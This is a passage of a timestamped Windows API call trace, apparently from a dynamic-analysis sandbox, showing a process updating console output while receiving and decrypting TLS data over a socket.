lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0159.583] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0159.584] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0159.584] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0159.585] CoTaskMemFree (pv=0x1e35146d810) [0159.585] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0159.585] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0159.752] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0159.752] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0159.752] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0159.754] CoTaskMemFree (pv=0x1e35146d810) [0159.754] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0159.754] recv (in: s=0x898, buf=0x1e3393bf4d5, len=88, flags=0 | out: buf=0x1e3393bf4d5*) returned 88 [0159.754] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e33954cf40, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e33954cf40, pfQOP=0x0) returned 0x0 [0159.754] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0159.755] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0159.834] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0159.834] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0159.834] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0159.835] CoTaskMemFree (pv=0x1e35146d810) [0159.835] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0159.835] recv (in: s=0x898, buf=0x1e3393bf4d5, len=16344, flags=0 | out: buf=0x1e3393bf4d5*) returned 16344 [0159.835] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e33954fed8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e33954fed8, pfQOP=0x0) returned 0x0 [0159.835] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0159.836] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0159.912] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0159.912] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0159.912] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0159.913] CoTaskMemFree (pv=0x1e35146d810) [0159.916] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0159.916] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.094] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.094] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0160.094] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0160.095] CoTaskMemFree (pv=0x1e35146d810) [0160.095] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0160.095] recv (in: s=0x898, buf=0x1e3393bf4d5, len=88, flags=0 | out: buf=0x1e3393bf4d5*) returned 88 [0160.095] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e339555c28, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e339555c28, pfQOP=0x0) returned 0x0 [0160.095] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.096] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.208] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.209] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0160.209] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0160.209] CoTaskMemFree (pv=0x1e35146d810) [0160.209] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0160.210] recv (in: s=0x898, buf=0x1e3393bf4d5, len=16344, flags=0 | out: buf=0x1e3393bf4d5*) returned 16344 [0160.210] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e339558bc0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e339558bc0, pfQOP=0x0) returned 0x0 [0160.210] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.210] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.296] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.297] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0160.297] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0160.298] CoTaskMemFree (pv=0x1e35146d810) [0160.298] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.299] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.422] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.423] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0160.423] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0160.423] CoTaskMemFree (pv=0x1e35146d810) [0160.423] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0160.423] recv (in: s=0x898, buf=0x1e3393bf4d5, len=88, flags=0 | out: buf=0x1e3393bf4d5*) returned 88 [0160.423] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e33955e910, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e33955e910, pfQOP=0x0) returned 0x0 [0160.424] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.424] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.500] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.500] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0160.501] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0160.501] CoTaskMemFree (pv=0x1e35146d810) [0160.501] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0160.501] recv (in: s=0x898, buf=0x1e3393bf4d5, len=16344, flags=0 | out: buf=0x1e3393bf4d5*) returned 16344 [0160.501] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e3395618a8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e3395618a8, pfQOP=0x0) returned 0x0 [0160.501] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.502] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.577] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.577] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0160.578] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0160.578] CoTaskMemFree (pv=0x1e35146d810) [0160.578] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.579] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.656] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.657] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0160.657] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0160.657] CoTaskMemFree (pv=0x1e35146d810) [0160.658] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0160.658] recv (in: s=0x898, buf=0x1e3393bf4d5, len=88, flags=0 | out: buf=0x1e3393bf4d5*) returned 88 [0160.658] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e3395675f8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e3395675f8, pfQOP=0x0) returned 0x0 [0160.658] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.658] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.743] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.744] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0160.744] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0160.744] CoTaskMemFree (pv=0x1e35146d810) [0160.744] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0160.744] recv (in: s=0x898, buf=0x1e3393bf4d5, len=16344, flags=0 | out: buf=0x1e3393bf4d5*) returned 16344 [0160.745] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e33956a590, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e33956a590, pfQOP=0x0) returned 0x0 [0160.745] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.745] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.839] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.839] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0160.839] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0160.840] CoTaskMemFree (pv=0x1e35146d810) [0160.840] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.840] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.919] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.920] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0160.920] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0160.920] CoTaskMemFree (pv=0x1e35146d810) [0160.920] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0160.920] recv (in: s=0x898, buf=0x1e3393bf4d5, len=16344, flags=0 | out: buf=0x1e3393bf4d5*) returned 16344 [0160.921] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e3395702e0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e3395702e0, pfQOP=0x0) returned 0x0 [0160.921] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0160.922] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.120] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.121] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0161.121] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0161.121] CoTaskMemFree (pv=0x1e35146d810) [0161.121] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.122] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.199] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.199] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0161.200] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0161.200] CoTaskMemFree (pv=0x1e35146d810) [0161.200] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0161.200] recv (in: s=0x898, buf=0x1e3393bf4d5, len=152, flags=0 | out: buf=0x1e3393bf4d5*) returned 152 [0161.200] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e339576030, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e339576030, pfQOP=0x0) returned 0x0 [0161.200] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.201] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.278] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.279] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0161.279] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0161.279] CoTaskMemFree (pv=0x1e35146d810) [0161.279] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0161.279] recv (in: s=0x898, buf=0x1e3393bf4d5, len=16344, flags=0 | out: buf=0x1e3393bf4d5*) returned 16344 [0161.280] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e339578fc8, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e339578fc8, pfQOP=0x0) returned 0x0 [0161.280] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.280] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.371] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.372] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0161.372] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0161.372] CoTaskMemFree (pv=0x1e35146d810) [0161.373] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.373] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.473] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.474] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0161.474] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0161.474] CoTaskMemFree (pv=0x1e35146d810) [0161.474] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0161.474] recv (in: s=0x898, buf=0x1e3393bf4d5, len=88, flags=0 | out: buf=0x1e3393bf4d5*) returned 88 [0161.475] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e33957ed18, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e33957ed18, pfQOP=0x0) returned 0x0 [0161.475] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.475] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.555] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.556] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0161.556] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0161.557] CoTaskMemFree (pv=0x1e35146d810) [0161.557] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0161.557] recv (in: s=0x898, buf=0x1e3393bf4d5, len=16344, flags=0 | out: buf=0x1e3393bf4d5*) returned 16344 [0161.557] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e339581cb0, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e339581cb0, pfQOP=0x0) returned 0x0 [0161.557] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.558] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.650] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.651] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0161.651] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0161.651] CoTaskMemFree (pv=0x1e35146d810) [0161.652] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.652] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.743] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.744] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0161.744] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0161.744] CoTaskMemFree (pv=0x1e35146d810) [0161.745] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0161.745] recv (in: s=0x898, buf=0x1e3393bf4d5, len=88, flags=0 | out: buf=0x1e3393bf4d5*) returned 88 [0161.745] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e339587a00, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e339587a00, pfQOP=0x0) returned 0x0 [0161.745] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.745] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.846] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.846] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0161.847] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0161.847] CoTaskMemFree (pv=0x1e35146d810) [0161.847] recv (in: s=0x898, buf=0x1e3393bf4d0, len=5, flags=0 | out: buf=0x1e3393bf4d0*) returned 5 [0161.847] recv (in: s=0x898, buf=0x1e3393bf4d5, len=16344, flags=0 | out: buf=0x1e3393bf4d5*) returned 16344 [0161.847] DecryptMessage (in: phContext=0x1e3394bbff0, pMessage=0x1e33958a998, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e33958a998, pfQOP=0x0) returned 0x0 [0161.847] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.848] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.937] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: lpConsoleScreenBufferInfo=0xb156f8d1d8) returned 1 [0161.938] CoTaskMemAlloc (cb=0x780) returned 0x1e35146d810 [0161.938] WriteConsoleOutputW (in: hConsoleOutput=0x398, lpBuffer=0x1e35146d810, dwBufferSize=0x40078, dwBufferCoord=0x0, lpWriteRegion=0xb156f8d070 | out: lpWriteRegion=0xb156f8d070) returned 1 [0161.938] CoTaskMemFree (pv=0x1e35146d810) [0161.939] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x398, lpConsoleScreenBufferInfo=0xb156f8d1d8 | out: 